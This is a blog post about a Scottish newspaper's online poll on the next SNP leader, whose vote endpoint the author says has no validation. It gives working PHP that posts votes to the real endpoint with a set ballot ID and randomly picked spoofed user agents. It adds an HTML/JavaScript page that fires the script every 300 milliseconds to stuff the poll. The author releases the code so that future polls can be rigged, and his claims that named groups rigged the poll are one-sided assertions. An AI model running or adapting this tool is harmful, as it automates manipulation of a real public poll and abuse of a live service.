Vote early, vote often
John Van Buren
For those who don’t know I have a degree in Computer Science (actually it’s a double major degree, computer science and psychology), with a focus on Computer Security.
Earlier this week the National published an online poll asking “Who would you like to see as the next SNP leader?”
It became clear that there was a coordinated attempt by Alba supporters and other unionists to rig the poll in favour of Dash Regen
Looking into how the poll worked, it occurred to me that posting could and likely was being automated.
There is no validation behind the post endpoint, so a simple HTTPS post request will allow you to cast a vote.
A POST request that can be scripted
<?php
function make_post_request($url, $data) {
$useragents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0',
'Mozilla/5.0 (OS/2; OS/2 i386) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.15.2 Chrome/83.0.4103.122 Safari/537.36 Dooble/2023.01.30',
'Twitter Bot 1342',
'Spotify/861200986 Android/28 (KFMAWI)',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36'
];
$options = array(
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\nUser-Agent: " . array_rand($useragents,1)[0] . "\r\n",
'method' => 'POST',
'content' => http_build_query($data),
),
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
return $result;
}
$url = 'https://www.thenational.scot/ws/public/ballot-add-vote/';
$data = [
'ballot_id' => '25175',
'options' => '1'
];
echo make_post_request($url, $data);
Of course, this just votes a single time, if you want to correct a poll like this then you need to automate that posting.
<!DOCTYPE html>
<html>
<head>
<title>Repeatedly Call PHP File with JavaScript</title>
<script type="text/javascript">
function callPHP() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
console.log(xmlhttp.responseText);
}
};
xmlhttp.open("GET", "test.php", true);
xmlhttp.send();
}
setInterval(callPHP, 300 ); // Call the PHP file every second
</script>
</head>
<body>
<h1>Repeatedly Call PHP File with JavaScript</h1>
<p>This page uses JavaScript to repeatedly call a PHP file in the same directory every second.</p>
</body>
</html>
BTW by putting this code into the public domain, it means that any poll the National run, from this point on, is likely will be won by whoever can be bothered to rig the poll. So when Wings supporters tell you how popular their cause is, point them at this post and show them how pointless caring about polls run by the National is.
Leave a Reply